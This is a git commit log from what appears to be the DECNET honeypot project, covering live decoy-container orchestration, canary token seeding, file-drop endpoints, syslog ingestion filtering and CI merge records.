column so labels never wrap into the input. Help text drops to
0.58rem dim under the input. Works identically in both surfaces.
2026-04-29 11:50:35 -04:00
e51666ee14 fix(ui): stop ServiceConfigForm from re-fetching schema every render
The schema useEffect depended on currentConfig, which the parent
passes as a fresh `{}` literal on every render — referentially new
each time, so the effect re-ran and the GET /services/.../schema
hammered the server.

Schema fetch now only depends on serviceSlug; form seeding from
currentConfig moved to a separate effect keyed on JSON-stringified
config so a real change reseeds but referential churn doesn't.
2026-04-29 11:48:20 -04:00
bd7f2dfaed feat(ui): schema-driven ServiceConfigForm in Fleet & MazeNET inspectors
ServiceConfigForm.tsx fetches /topologies/services/{slug}/schema and renders
typed inputs (string/password/int/bool/textarea/enum) with reveal toggles for
secrets. SAVE persists via PUT (no restart); APPLY persists + force-recreates
the service container after a confirm dialog (matches the forwards_l3 pattern).

Mounts:
- DeckyFleet DeckyCard: clicking a service tag toggles the form below the
  EXPOSED row, gated on liveServicesEnabled (admin + non-swarm).
- MazeNET Inspector: renders the form above REMOVE SERVICE when a service
  is selected on a non-observed decky.

UI test plan is manual — no jsdom test infra in decnet_web yet.
2026-04-29 11:41:43 -04:00
75b1ce3a31 feat(api): per-service config schema endpoint + PUT/POST update+apply for fleet & topology
- GET /topologies/services/{name}/schema serves the declared ServiceConfigField
  metadata so the Inspector can auto-render forms.
- PUT  /(topologies/{id}/)deckies/{decky}/services/{svc}/config persists the
  validated dict (DB + compose); container untouched (Save).
- POST /(topologies/{id}/)deckies/{decky}/services/{svc}/apply persists then
  force-recreates <decky>-<svc> so the new env takes effect (Apply, destructive).
- New engine helper update_service_config wires both fleet and topology paths
  through the existing _persist_fleet_change / _rerender_topology_compose
  machinery; emits decky.<name>.service_config_changed on the bus.
2026-04-29 11:38:06 -04:00
54b1fbed14 feat(services): declarative config_schema on BaseService + SSH/HTTP/HTTPS descriptors
ServiceConfigField dataclass + BaseService.validate_cfg coerce/drop submitted
service_cfg dicts against per-service typed schemas. SSH/HTTP/HTTPS now declare
the keys they already read in compose_fragment, so the upcoming Inspector form
has metadata to render from instead of hardcoded inputs per service.
2026-04-29 11:28:53 -04:00
d314470d7f fix(stats): keep TopologyDecky.state in sync with docker so ACTIVE DECKIES counts right
Dashboard's ACTIVE DECKIES (active_deckies in get_stats_summary) counts
TopologyDecky rows where state='running'.  No code path was flipping
that state away from the default 'pending', so the count read 0/N
even when every container was running fine — the dashboard was lying.

Two complementary fixes:

1. deploy_topology — after the post-deploy compose ps verification,
   reconcile each TopologyDecky.state from the corresponding base
   container's docker state.  running → 'running'; anything else →
   'failed'.  Reuses the ps_rows already gathered for the
   ACTIVE-vs-DEGRADED status decision; no extra docker hit.

2. apply_add_decky — _materialise_decky_spawn now returns True/False;
   on True the row is updated to state='running' before
   _assert_valid_after.  Catches the case where a decky added via the
   live mutator queue stays at 'pending' indefinitely (the deployer's
   reconcile only runs on a fresh deploy_topology pass).

Existing topology deckies in active topologies will still read as
'pending' until the next deploy_topology runs, since this is
forward-only.  An operator-side fix is to teardown + redeploy or run
the (forthcoming) reconcile-on-startup pass.
2026-04-29 11:09:32 -04:00
57e527534c fix(mutator): auto-fall-back to legacy builder when buildx wedges live decky add
apply_add_decky's compose-up was hard-failing whenever the operator's
~/.docker/buildx/activity/ landed on a read-only mount — the wedge
detection in _compose_with_retry correctly refuses to retry (would
just leak more mounts), but for live materialisation we don't want a
wedged buildx state to abort an admin's mutation.  ANTI hit it on
adding decky-a977: 'failed to update builder last activity time: ...
read-only file system → buildx wedge detected → returned non-zero'.

_compose_up_with_buildkit_fallback wraps _compose_with_retry: on a
CalledProcessError whose stderr matches both wedge signatures
(_BUILDX_WEDGE_SIGNATURE + _BUILDX_EROFS_SIGNATURE), it logs a
warning with the manual recovery steps + retries once with
DOCKER_BUILDKIT=0 set.  The legacy non-buildx builder doesn't use
the activity dir and isn't affected.

Wired into the two paths that pass --build:
* _materialise_decky_spawn (apply_add_decky)
* _materialise_decky_services_diff (apply_update_decky service add)

_materialise_decky_recreate_base doesn't build — it just recreates a
container from an existing image — so it's not affected.

Operator-facing log message points at the manual fix
(rm -rf ~/.docker/buildx/activity + docker buildx create) so they
can recover at their leisure; we don't ATTEMPT the recovery because
the activity dir might be RO for a reason (zfs/btrfs snapshot, etc.)
that an automated rm would be wrong to fight.
2026-04-29 10:59:04 -04:00
892219ec87 feat(mutator): refuse forwards_l3 promotion on non-DMZ deckies
apply_update_decky's flip path now refuses to promote a decky to
gateway unless its home LAN is a DMZ.  The compose generator publishes
host ports for forwards_l3=True; a non-DMZ gateway would shadow the
host's port space without anything legitimately able to reach the
service.  Same posture as the existing 'forwards_l3 flip on live
requires force=true' guard — refused before any DB write so a bad
mutation leaves zero side-effects.

The check is intentionally NOT a standing _RULES invariant — the
codebase uses forwards_l3 for two semantics:

  1. Generic L3 forwarding (internal bridge deckies routing between
     their multi-home LANs).  The generator writes this on internal
     bridges via bridge_forward_probability; legitimately non-DMZ.
  2. DMZ gateway (host-port publisher).  Only meaningful on DMZ.

Standing validation can't enforce DMZ-homing without breaking case 1.
The guard fires only on the explicit user-driven flip path where the
operator's intent is unambiguously case 2.  Generator output and
internal-bridge attachments bypass the check.

check_gateway_homed_in_dmz lives in validate.py for callers that want
the explicit form (and for the test surface), but is not a standing
rule — comment in _RULES explains the asymmetry.
2026-04-29 00:38:51 -04:00
c002c5a4f1 feat(ui): forwards_l3 toggle in Inspector with destructive-recreate confirm
W5's apply_update_decky now accepts a forwards_l3 flip on a live
topology only when payload['force'] is true (the unforced flip raises
MutationError to keep half-thinking operators from killing
in-container state).  Until this commit there was no UI surface that
could even submit such a flip.

Inspector grows a 'PROMOTE TO GATEWAY' / 'DEMOTE GATEWAY' button when
a (non-observed) decky is selected.  The handler:

* On pending topologies → submits via editor.updateDecky immediately.
  No confirm dialog; no live containers to disturb.
* On active/degraded topologies → window.confirm() explaining the
  destructive base recreate ('In-container state is lost; active
  sessions to it drop'), then submits with extras.force=true.

useTopologyEditor.updateDecky grows an optional extras arg that
threads force: true into the queued mutation payload.  The pending
CRUD path ignores it (no force needed when no containers exist).

MazeNET.tsx wires a toggleGateway callback that handles the
optimistic local state update, surfaces an enqueue toast on the
active path, and lets the SSE forwarder reconcile when
mutation.applied lands.
2026-04-29 00:29:46 -04:00
a27e3f5e0f fix(tests+mutator): unbreak the docker-shadow test env + let mutator delete from active
Two related fixes that came out of running the W5 tests locally:

1. tests/__init__.py — empty file, makes 'tests/' a package so pytest
   stops inserting it into sys.path.  Without it, 'tests/docker/'
   (the docker-image test category) shadowed the installed docker SDK
   on every engine-touching test in the repo:

     module 'docker' has no attribute 'DockerClient'

   Pytest's default --import-mode=prepend was the culprit; making
   tests/ a package is the cheapest fix and doesn't change
   --import-mode for the whole tree.

2. delete_topology_decky / delete_topology_edge / delete_lan grow an
   'enforce_pending: bool = True' kwarg.  Default preserves the HTTP
   CRUD guard (api_decky_crud / api_edge_crud / api_lan_crud get the
   409 for free).  apply_remove_decky / apply_detach_decky /
   apply_remove_lan now pass enforce_pending=False — the mutator
   queue is the live-editing surface and has its own active-topology
   gating; the repo's pending-only guard was for design-time CRUD
   that mustn't bypass it.  Without this, apply_remove_decky was
   silently broken on active topologies pre-W5; W5's new test
   surfaced it on first run.

10/10 new W5 tests pass; 58/58 across mutator + topology suites.
2026-04-29 00:24:17 -04:00
98c929894c feat(mutator): selective materialisation for apply_update_decky + tests
apply_update_decky now discriminates three sub-cases:

* services list changed → diff old vs new and call
  _materialise_decky_services_diff (compose up -d for added,
  stop + rm -f for removed).  Mirrors services_live's pattern but
  doesn't import it — mutator-routed mutations carry a different bus
  surface (mutation.applied) than the direct API path
  (decky.<name>.service_added).
* forwards_l3 flipped → port publishing changes, which docker can
  only apply at container-create time.  Gated on payload['force'] is
  true; default raises MutationError so a half-thinking operator
  can't stomp a live decky.  When force=true,
  _materialise_decky_recreate_base does compose up -d --no-deps
  --force-recreate.  Pre-checked BEFORE the DB write so a refused
  mutation leaves zero side-effects.
* coord-only (x/y) → DB only, no docker work.

Ships tests/mutator/test_ops_materialisation.py with focused coverage
for every new helper: add_decky/remove_decky/attach_decky/
detach_decky/update_decky/update_lan paths against an active
topology, with compose primitives + docker SDK mocked at the source
modules so the helpers' lazy imports pick up the stubs.  Also covers
the pending-topology skip and the force-flag gating.
2026-04-29 00:18:20 -04:00
e3afec4e70 feat(mutator): live network.disconnect for apply_detach_decky
Symmetric to apply_attach_decky — after deleting the multi-home edge
from the DB, calls the docker SDK to drop the base container's
interface in the now-detached LAN.  Service containers lose
visibility automatically (they share the base's netns).

Idempotency: 'not connected' / 'no such' APIError is logged at info
and treated as success.
2026-04-29 00:15:39 -04:00
f347a3a736 feat(mutator): live network.connect for apply_attach_decky
After the DB writes that record the multi-home edge, calls the docker
SDK directly to add an interface to the base container's netns:

  client.networks.get(<topology bridge>).connect(<base>, ipv4_address=ip)

Non-destructive — the base keeps running, no recreate.  Service
containers automatically see the new interface because they share
the base's netns via network_mode: service:<base>.

Idempotency: docker APIError with 'already' / 'endpoint exists' is
logged at info and treated as success.  Other errors log + leave the
DB row in place; an operator retry will hit the same path.
2026-04-29 00:15:11 -04:00
eed55619cb feat(mutator): live teardown for apply_remove_decky
Captures the decky's name and services list before delete_topology_decky
runs (the helper needs both as compose targets even though the DB row
is gone), then calls _materialise_decky_remove which stops + rm -f's
the base + per-service containers via 'docker compose stop / rm -f'.

Re-renders the per-topology compose AFTER the stop/rm so a future
'compose up -d' on the file doesn't try to bring the decky back.
2026-04-29 00:14:44 -04:00
8c06190e69 feat(mutator): live spawn for apply_add_decky + shared materialisation helpers
Adds _materialise_decky_{spawn,remove,connect,disconnect,services_diff,recreate_base}
helpers alongside the existing _materialise_lan_change.  Each follows
the same skip rules: bail when topology is not active/degraded, when
agent-pinned, or when docker calls fail (logged, not re-raised — DB
remains source of truth).

apply_add_decky now calls _materialise_decky_spawn after the DB writes.
The helper:

* re-renders the per-topology compose so it lists the new decky;
* runs 'compose up -d --no-deps --build <decky_base> <decky>-<svc>...'
  in a worker thread (matches engine/services_live's pattern).

Service container targets are filtered through get_service() so
fleet_singleton services are skipped — they don't have per-decky
compose entries.  Gateway (forwards_l3=True) deckies need no
special-case here; the compose generator already emits the host
'ports:' block for them.

Subsequent commits wire the other apply_* ops to the matching
helpers.  Tests for the full set ship in the workstream's last
commit.
2026-04-29 00:14:18 -04:00
578cdf9e2e fix(mutator): reject hostile apply_update_lan changes on live topologies
subnet and is_dmz are pinned at deploy time — live deckies bind to
the bridge with IPs allocated from the old subnet, and is_dmz flips
the docker network's internal flag which can't be changed while
containers are attached.  Today the op happily wrote the new value
into the DB and left docker on the old one, drifting the two surfaces.

apply_update_lan now raises MutationError when topology status is
active or degraded and the patch touches subnet or is_dmz.  Coord
(x/y) and rename updates still pass through; renames don't currently
have a live caller and the bridge's docker name keys off the lan name
in the renderer, so the next deploy will reconcile.

This matches the posture taken by _materialise_lan_change for live
LAN add/remove (commit 472c84b).
2026-04-29 00:12:44 -04:00
2731b2608b fix(ui): keep multi-homed deckies in their home LAN on rehydrate
list_topology_edges has no ORDER BY, so SQL row order is undefined.
After apply_attach_decky added a bridge edge to a second LAN, on
refetch the bridge edge could come back first — firstLanFor then
picked it as the decky's home and the visualization 'teleported' the
decky into the other LAN (the bug ANTI saw immediately after
connecting two deckies across LANs).

Hydration now prefers the non-bridge edge (is_bridge=false) as home.
apply_add_decky writes is_bridge=false for the original edge;
apply_attach_decky writes is_bridge=true for subsequent multi-homing
edges.  Picking the non-bridge edge is stable across row reordering.

Two-pass implementation: pass 1 sets pinned homes (DMZ for gateways,
non-bridge for others); pass 2 fills any gap with the first edge
(legacy rows where is_bridge was never written).
2026-04-29 00:01:29 -04:00
472c84b9c8 fix(mutator): materialise live LAN add/remove on docker, not just the DB
apply_add_lan and apply_remove_lan were DB-only — they wrote/deleted
the topology_lans row but never created or destroyed the docker bridge
network.  Adding a LAN to a deployed topology silently did nothing on
the substrate side; any decky later attached to it had nowhere to bind.

Both ops now call a shared _materialise_lan_change helper after the DB
write.  When the topology is active/degraded and not pinned to a swarm
agent, the helper:

* creates / removes the docker bridge network (internal=True for
  non-DMZ LANs, mirroring engine/deployer.deploy_topology),
* re-renders the per-topology compose file so future redeploys reflect
  the change.

Failures are logged, not re-raised — the DB row stays as source of
truth so an operator can retry without leaking inconsistent state.
Agent-pinned topologies are skipped; the next agent push reconciles.

apply_add_decky / apply_attach_decky have the same gap and are not
fixed here — multi-homing a running container needs careful
recreate-vs-network-connect handling and is its own commit.  Without
those, dropping a decky into a freshly-added LAN still won't spawn a
container; only the LAN itself is now live.
2026-04-29 00:00:02 -04:00
bbed52a962 fix(bus): topic segments can't contain dots — service.added → service_added
Bus topic segments are NATS-style tokens and the validator at
bus/topics.py:402 rejects '.', '*', '>', whitespace.  My W3 constants
'service.added' / 'service.removed' tripped this on every live
add/remove call:

  ValueError: topic segment 'service.added' may not contain '.', ...

Renamed both to underscore form: DECKY_SERVICE_ADDED = 'service_added'.
Aligned the SSE forwarder's name mapping (decky.<name>.service_added →
SSE event 'decky.service_added') and the frontend's
useTopologyStream listener + MazeNET.tsx event handler.  Also updated
the wiki entry with a note about the underscore.
2026-04-28 23:53:25 -04:00
d595240f55 fix(engine): post-deploy verify topology containers, mark DEGRADED on boot crash
deploy_topology was flipping to ACTIVE the moment 'compose up -d'
returned 0, but compose returns 0 as soon as containers are *started*.
A service that crashes on boot (port bind failure, bad image, missing
entrypoint) left the topology row sitting at ACTIVE indefinitely while
half the substrate was dead.

After compose returns, we now run 'compose ps --all --format json',
parse the newline-delimited per-container rows, and downgrade to
DEGRADED with a reason listing the first eight unhealthy containers if
anything isn't in state='running'.  Operators see real state on the
topology page instead of an optimistic flag.

_compose_ps swallows compose-level errors (returns []) so an unrelated
docker hiccup doesn't gate the success path — the existing in-flight
exception path still catches genuine deploy failures with FAILED.
2026-04-28 23:39:50 -04:00
9e8d0b0464 fix(ui): route palette drops + design-time remove through live API on active topologies
When topoStatus is active/degraded, editor.updateDecky enqueues into
the mutator queue and returns {kind:'enqueued'}.  The palette-drop
handler then short-circuits on that and never updates local state, so
a service dragged onto a deployed decky just vanishes — what ANTI saw
as 'no way to APPLY'.

Same gap on the design-time 'REMOVE SERVICE' button in the Inspector's
service detail panel: enqueue + no local update = chip stays.

Both now route through liveAddService / liveRemoveService when the
topology is active, hitting POST/DELETE /topologies/{id}/deckies/{name}/services
directly and patching local state from the response.  Pending
topologies still queue through the mutator (correct: no live
containers to mutate).

Hoisted serviceRegistry / liveAddService / liveRemoveService above
the palette-drop callback so the deps array doesn't trip the const
TDZ at render time.
2026-04-28 23:38:37 -04:00
463877b8fc fix(ui): hit /topologies/ with trailing slash to keep bearer
FastAPI's redirect_slashes=True 307s /topologies → /topologies/, and
the browser drops Authorization on the redirected URL — the topology
picker in the canary create modal was landing as 401 even for admins.
Hit the canonical (trailing-slash) path so the request resolves on the
first hop.
2026-04-28 23:18:39 -04:00
0e5484648f feat: forward decky.*.service.* on per-topology SSE stream
The /topologies/{id}/events SSE proxy now subscribes to two bus
patterns concurrently and merges them through a bounded asyncio.Queue:

* topology.{id}.>  — lifecycle (status, mutation.*) — unchanged.
* decky.>          — per-decky events, filtered by payload.topology_id
                     so a fleet decky sharing a name with a topology
                     decky doesn't leak across.

_sse_name_for routes 'decky.<name>.service.added' to the SSE event
name 'decky.service.added' (kept the prefix so the frontend doesn't
collide with topology lifecycle events that share leaf names like
'status').

useTopologyStream surfaces the two new event names; MazeNET.tsx's
onStreamEvent optimistically patches the matching node's services
list so a second tab reflects shape changes without a refetch.
2026-04-28 23:15:38 -04:00
e7d49d7237 feat(ui): live service add/remove on fleet DeckyCard
DeckyCard grows the same per-chip × + dashed '+ ADD' affordances we
just shipped on the MazeNET Inspector.  Wired to POST/DELETE
/api/v1/deckies/{name}/services{,/svc}; the response's services list
flows back through onServicesChanged to update the parent's deckies
state without a refetch.

Gated on isAdmin && !decky.swarm — swarm deckies live on a remote
agent and the W3 endpoint runs docker compose locally, same gap as
the canary planter has for agent-pinned topologies.  Out of scope
here; flagged as a known limitation.

stopPropagation on the inline buttons + add-row container keeps the
card-level click (which selects the decky for inspection) from firing
on intra-row interactions.
2026-04-28 23:13:46 -04:00
1a631c9400 fix(ui): narrow services type for Inspector live-add picker
ObservedNode.services is the literal tuple ['*']; narrowing inside the
.filter() callback was tripping TS2345.  We already gate the live
controls on node.kind !== 'observed', so casting to readonly string[]
inside the filter is safe and keeps the discriminated union strict
elsewhere.
2026-04-28 23:11:39 -04:00
2fabcd1c29 feat(ui): live service add/remove on MazeNET Inspector
When the topology is active/degraded the Inspector switches services
chips into live controls: each chip gets a × button that DELETEs to
the W3 endpoint, and a dashed '+ ADD' chip opens a typeahead picker
fed by useServiceRegistry().perDecky.

Pending topologies still use the existing design-time path
(onRemoveService → editor.updateDecky); the Inspector picks based on
topologyStatus, so an operator never accidentally hits a live API
call against a topology that isn't deployed yet.

The mutation handlers in MazeNET.tsx hit POST/DELETE
/api/v1/topologies/{id}/deckies/{name}/services{,/svc} and
optimistically apply the response's services list to local state.
Cross-tab reconciliation rides on the SSE forwarder shipped in the
follow-up commit.
2026-04-28 23:11:02 -04:00
06f208c86e feat: surface fleet_singleton flag on /topologies/services
Adds a fleet_singletons array to ServiceCatalogResponse so per-decky
add UIs can filter out services like LLMNR that run once fleet-wide
(and would 422 server-side at the live add endpoint).

The existing 'services: list[str]' field is unchanged for back-compat
with MazeNET/useMazeApi.ts:257; the new field is additive.

decnet_web/src/hooks/useServiceRegistry.ts wraps the endpoint with a
module-scoped cache (registry only changes on BYOS install / plugin
drop, neither of which happens mid-session) and exposes a precomputed
.perDecky list so consumers don't need to re-derive the diff.
2026-04-28 23:08:29 -04:00
4287e94deb feat(ui): file drops tab on CanaryTokens
CanaryTokens.tsx grows a third tab — File drops — alongside Tokens
and Blobs.  The page now covers every 'admin landed bytes on a decky'
operation in one place.

FileDropModal mirrors the canary CreateModal's shape: Fleet/MazeNET
toggle, topology+decky picker, absolute-path validation matching the
backend (DeckyFileDropRequest rejects relative + ..-traversal), mode
+ mtime offset inputs, and a -1w preset for backdating.  FileReader →
data URL → strip prefix → POST /api/v1/deckies/files.

The list is local-only (localStorage, capped at 200 entries).  W2's
backend doesn't persist drops by design — the endpoint is for staging
payloads, not as an audit trail.  CLEAR LIST button on the tab; no
DELETE button on rows since the local entry doesn't track whether the
file is still there (an attacker may have moved it).

Alt+D shortcut joins Alt+C; alt-key only per the Linux-meta-key rule.
2026-04-28 23:06:53 -04:00
c942d4d333 feat(ui): scope canary tokens to MazeNET topology deckies
CanaryTokens.tsx grows a Fleet/MazeNET toggle in the create modal.  In
topology mode we hydrate /topologies?status=active for the topology
picker, then GET /topologies/{id} on selection to repopulate the decky
picker — topology deckies have a different shape than fleet's /deckies
endpoint.

The tokens table gains a SCOPE column (chip: 'fleet' / 'topology'),
and a third filter dropdown alongside state.  The drawer's metadata
section shows a Scope row with a clickable jump-link back to the
MazeNET view at the right topology.

CanaryTokenRow grows a topology_id field so the drawer/list can
discriminate without re-fetching.
2026-04-28 23:04:13 -04:00
6ac8cac908 feat(deckies): live service add/remove without full redeploy
decnet.engine.services_live exposes add_service / remove_service for
both fleet and topology decky scopes.  The host's _compose() wrapper
already supported per-service targeting (up --no-deps -d <svc>,
stop, rm -f); what was missing was the orchestration around it:

* add: validate against decnet.services.registry (rejects unknown +
  fleet_singleton); persist the new services list; re-render the
  per-scope compose file (so future redeploys reflect the change);
  run docker compose up -d --no-deps --build <decky>-<svc>.
* remove: stop + rm -f the service container; persist; re-render
  compose so a future up -d doesn't bring it back.

Both publish decky.<name>.service.added / .removed on the bus, with
the post-mutation services list.  Topic constants added to
decnet.bus.topics; the matching wiki entry in wiki-checkout/Service-Bus.md
ships in a separate commit on the wiki repo (wiki-checkout/ is gitignored).

Four new admin endpoints:

* POST/DELETE /api/v1/deckies/{name}/services{,/svc}
* POST/DELETE /api/v1/topologies/{id}/deckies/{name}/services{,/svc}

ServiceMutationError messages are mapped at the API boundary to 404
(decky/topology missing), 409 (idempotency violation), 422 (unknown
or fleet_singleton service).
2026-04-28 22:51:42 -04:00
0bc4b05c73 feat(deckies): generic file drops on fleet + MazeNET deckies
Extracts the docker-exec-with-base64-stdin pattern out of canary/planter
and orchestrator/drivers/ssh into a shared decnet.decky_io package.
Both consumers now delegate; the canary planter test still proves the
contract end-to-end.

Adds POST/DELETE /api/v1/deckies/files for arbitrary file drops.
Container resolution is shared with the canary path: topology_id absent
means fleet (<name>-ssh), present routes through resolve_decky_container
which picks <name>-ssh when the topology decky exposes ssh, else the
topology base container decnet_t_<id8>_<name>.

Path validation rejects relative paths and '..' traversal at the request
model layer.  Bad base64 → 400; unknown topology → 404; decky not in
topology → 422; docker exec failure → 409.
2026-04-28 22:43:34 -04:00
3fe999d706 feat(canary): allow custom canaries on MazeNET deckies via API
POST /api/v1/canary/tokens grows an optional topology_id field.  When
present, the server hydrates the topology, validates the named decky is
in it, and resolves the docker container via
planter.resolve_topology_container — <name>-ssh if the decky exposes ssh,
else the topology base container.  Absent ⇒ fleet semantics, unchanged.

The token row gets a nullable topology_id column (no migration helper
per pre-v1 policy).  GET /api/v1/canary/tokens accepts ?topology_id= as
a filter.  DELETE re-resolves the container at revoke time so a
redeployed topology is still reachable.

422 when the named decky isn't in the topology; 404 when the topology
itself doesn't exist.
2026-04-28 22:34:45 -04:00
5802de1f86 feat(canary): seed baseline canaries on MazeNET deckies
Topology deploys now plant the configured canary baseline set on every
decky in the topology, mirroring the fleet-deploy hook. Containers are
resolved via resolve_topology_container — <decky>-ssh when the decky
exposes an ssh service, else the topology base container
decnet_t_<id8>_<decky>.

The planter's plant/revoke/seed_baseline grow an optional container=
kwarg; default preserves the fleet <name>-ssh resolution.
2026-04-28 22:30:11 -04:00
04b0637c24 feat(bounty): wire artifact download into BountyInspector drawer
The Vault page already shows file drops and stored mail (e3ddeb0) but
the inspector drawer had no download button — only the live-feed
ArtifactDrawer/MailDrawer offered raw byte retrieval. Add a DOWNLOAD
RAW action to BountyInspector that fires when bounty_type=artifact,
hitting /artifacts/{decky}/{stored_as}?service=<svc> with the bounty's
own service field (ssh or smtp). Mirrors ArtifactDrawer's blob handling
and 400/403/404 error mapping.

Also widen the icon/label vocabulary: artifact bounties get FileText
(file drops) or Mail (message_stored) instead of the generic Package,
and the inspector header chip mirrors the change.
2026-04-28 22:03:58 -04:00
e3ddeb0395 feat(bounty): surface file drops and stored mail in the Vault
The Bounty Vault page only read from the Bounty table, but
inotifywait-captured file drops (event_type=file_captured) and SMTP
quarantined messages (event_type=message_stored) were only landing in
the Logs table. AttackerDetail's tabs queried logs directly, so they
showed up per-attacker but were invisible on the global Vault page.

Mirror both events into Bounty as bounty_type=artifact with
payload.kind ∈ {file, mail} so the existing dedup
(bounty_type, attacker_ip, payload) collapses repeats by sha256. Add an
ARTIFACTS segment to the Vault filter row, plus dedicated render
branches: file drops show orig_path + size + writer attribution; mail
shows subject + From + attachment count + size, with the Mail icon
distinguishing them from FileText for file drops.

Forward-only — existing logs stay where they are. A backfill pass would
be straightforward (read Log WHERE event_type IN ('file_captured',
'message_stored') and feed each row through _extract_bounty) but is out
of scope here.
2026-04-28 19:42:54 -04:00
88f276e9e7 feat(collector): drop native unix daemon syslog from ingestion
sshd, pam_unix, sudo, CRON, systemd, kernel, rsyslogd, and dbus-daemon
all share the SSH/telnet decky containers and write to the same syslog
socket as DECNET's own emitters. Their output was being parsed and
ingested into the JSON stream, the dashboard, and the profiler — pure
noise: sshd's "Failed password for root from X" duplicates the
auth-helper's structured auth_attempt event, pam_unix repeats it again,
CRON/systemd say nothing about attacker behavior.

Drop these APP-NAMEs in _should_ingest before the JSON write and bus
publish. Raw .log file still captures everything for forensics. The
denylist is overridable with DECNET_COLLECTOR_DROP_APPS so operators
can extend it without code changes.
2026-04-28 19:21:39 -04:00
6055f9c837 fix(deckies): set MSGID=command on bash PROMPT_COMMAND syslog lines
Add --rfc5424 --msgid command to the logger invocation in SSH and telnet
decky bashrc. MSGID arrives as "command" instead of NIL, which is what
the profiler's _COMMAND_EVENT_TYPES filter expects. The parser heuristic
shipped in d4591b3 stays as a safety net for any future emitter that
forgets the flags or for inflight pre-rebuild containers.
2026-04-28 19:12:11 -04:00
d4591b38dc fix(profiler): aggregate bash PROMPT_COMMAND lines into attacker profile
SSH/telnet decky containers emit shell commands via `logger -t bash "CMD …"`
which produces RFC 5424 lines with MSGID=NIL. Both parsers were leaving
event_type="-", so the behavioral profiler's `_COMMAND_EVENT_TYPES` filter
silently dropped them — the IP profile existed but no command transcripts
or artifacts. Confirmed in the wild: 44/48 events from one attacker were
event_type="-".

Rewrite event_type to "command" in both parsers when MSGID=NIL and the
msg starts with "CMD ". Correlation parser also extracts the cmd= payload
into fields["command"] so the profiler can build the transcript; collector
parser leaves fields={} to avoid duplicate pills in the dashboard.
2026-04-28 19:09:41 -04:00
862e4dbb31 merge: testing → main (reconcile 2-week divergence) 2026-04-28 18:36:00 -04:00
DECNET CI
499836c9e4 chore: auto-release v0.2 [skip ci] 2026-04-13 11:50:02 +00:00
bb9c782c41 Merge pull request 'tofix/merge-testing-to-main' (#6) from tofix/merge-testing-to-main into main
Some checks failed
Release / Auto-tag release (push) Successful in 16s
Release / Build, scan & push conpot (push) Failing after 4m22s
Release / Build, scan & push elasticsearch (push) Failing after 4m37s
Release / Build, scan & push llmnr (push) Failing after 4m32s
Release / Build, scan & push mongodb (push) Failing after 4m35s
Release / Build, scan & push ldap (push) Failing after 4m44s
Release / Build, scan & push docker_api (push) Failing after 4m57s
Release / Build, scan & push imap (push) Failing after 4m50s
Release / Build, scan & push http (push) Failing after 4m59s
Release / Build, scan & push mssql (push) Failing after 4m28s
Release / Build, scan & push mqtt (push) Failing after 4m38s
Release / Build, scan & push ftp (push) Failing after 5m8s
Release / Build, scan & push k8s (push) Failing after 5m3s
Release / Build, scan & push mysql (push) Failing after 1m56s
Release / Build, scan & push redis (push) Has started running
Release / Build, scan & push rdp (push) Has been cancelled
Release / Build, scan & push pop3 (push) Has been cancelled
Release / Build, scan & push postgres (push) Has been cancelled
Release / Build, scan & push sip (push) Has started running
Release / Build, scan & push smb (push) Has started running
Release / Build, scan & push smtp (push) Has started running
Release / Build, scan & push snmp (push) Has started running
Release / Build, scan & push ssh (push) Has started running
Release / Build, scan & push telnet (push) Has started running
Release / Build, scan & push tftp (push) Has started running
Release / Build, scan & push vnc (push) Has started running
Reviewed-on: #6
2026-04-13 13:49:47 +02:00
597854cc06 Merge branch 'merge/testing-to-main' into tofix/merge-testing-to-main
Some checks failed
PR Gate / Lint (ruff) (pull_request) Successful in 17s
PR Gate / SAST (bandit) (pull_request) Successful in 23s
PR Gate / Dependency audit (pip-audit) (pull_request) Successful in 36s
PR Gate / Test (pytest) (3.12) (pull_request) Failing after 1m0s
PR Gate / Test (pytest) (3.11) (pull_request) Failing after 1m10s
2026-04-13 07:48:43 -04:00
3b4b0a1016 merge: resolve conflicts between testing and main (remove tracked settings, fix pyproject deps) 2026-04-13 07:48:37 -04:00
DECNET CI
8ad3350d51 ci: auto-merge dev → testing [skip ci] 2026-04-13 05:55:46 +00:00
23ec470988 Merge pull request 'fix/merge-testing-to-main' (#4) from fix/merge-testing-to-main into main
Some checks failed
Release / Auto-tag release (push) Failing after 8s
Release / Build, scan & push cowrie (push) Has been skipped
Release / Build, scan & push docker_api (push) Has been skipped
Release / Build, scan & push elasticsearch (push) Has been skipped
Release / Build, scan & push ftp (push) Has been skipped
Release / Build, scan & push http (push) Has been skipped
Release / Build, scan & push imap (push) Has been skipped
Release / Build, scan & push k8s (push) Has been skipped
Release / Build, scan & push ldap (push) Has been skipped
Release / Build, scan & push llmnr (push) Has been skipped
Release / Build, scan & push mongodb (push) Has been skipped
Release / Build, scan & push mqtt (push) Has been skipped
Release / Build, scan & push mssql (push) Has been skipped
Release / Build, scan & push mysql (push) Has been skipped
Release / Build, scan & push pop3 (push) Has been skipped
Release / Build, scan & push postgres (push) Has been skipped
Release / Build, scan & push rdp (push) Has been skipped
Release / Build, scan & push real_ssh (push) Has been skipped
Release / Build, scan & push redis (push) Has been skipped
Release / Build, scan & push sip (push) Has been skipped
Release / Build, scan & push smb (push) Has been skipped
Release / Build, scan & push smtp (push) Has been skipped
Release / Build, scan & push snmp (push) Has been skipped
Release / Build, scan & push tftp (push) Has been skipped
Release / Build, scan & push vnc (push) Has been skipped
Reviewed-on: #4
2026-04-12 10:10:19 +02:00
4064e19af1 merge: resolve conflicts between testing and main
Some checks failed
PR Gate / Lint (ruff) (pull_request) Failing after 11s
PR Gate / Test (pytest) (3.11) (pull_request) Failing after 10s
PR Gate / Test (pytest) (3.12) (pull_request) Failing after 10s
PR Gate / SAST (bandit) (pull_request) Successful in 12s
PR Gate / Dependency audit (pip-audit) (pull_request) Failing after 13s
2026-04-12 04:09:17 -04:00
DECNET CI
ac4e5e1570 ci: auto-merge dev → testing
All checks were successful
CI / Lint (ruff) (push) Successful in 11s
CI / Test (pytest) (3.11) (push) Successful in 1m9s
CI / Test (pytest) (3.12) (push) Successful in 1m14s
CI / SAST (bandit) (push) Successful in 12s
CI / Dependency audit (pip-audit) (push) Successful in 21s
CI / Merge dev → testing (push) Has been skipped
CI / Open PR to main (push) Successful in 6s
PR Gate / Lint (ruff) (pull_request) Successful in 11s
PR Gate / Test (pytest) (3.11) (pull_request) Successful in 1m13s
PR Gate / Test (pytest) (3.12) (pull_request) Successful in 1m12s
PR Gate / SAST (bandit) (pull_request) Successful in 13s
PR Gate / Dependency audit (pip-audit) (pull_request) Successful in 21s
2026-04-12 07:53:07 +00:00
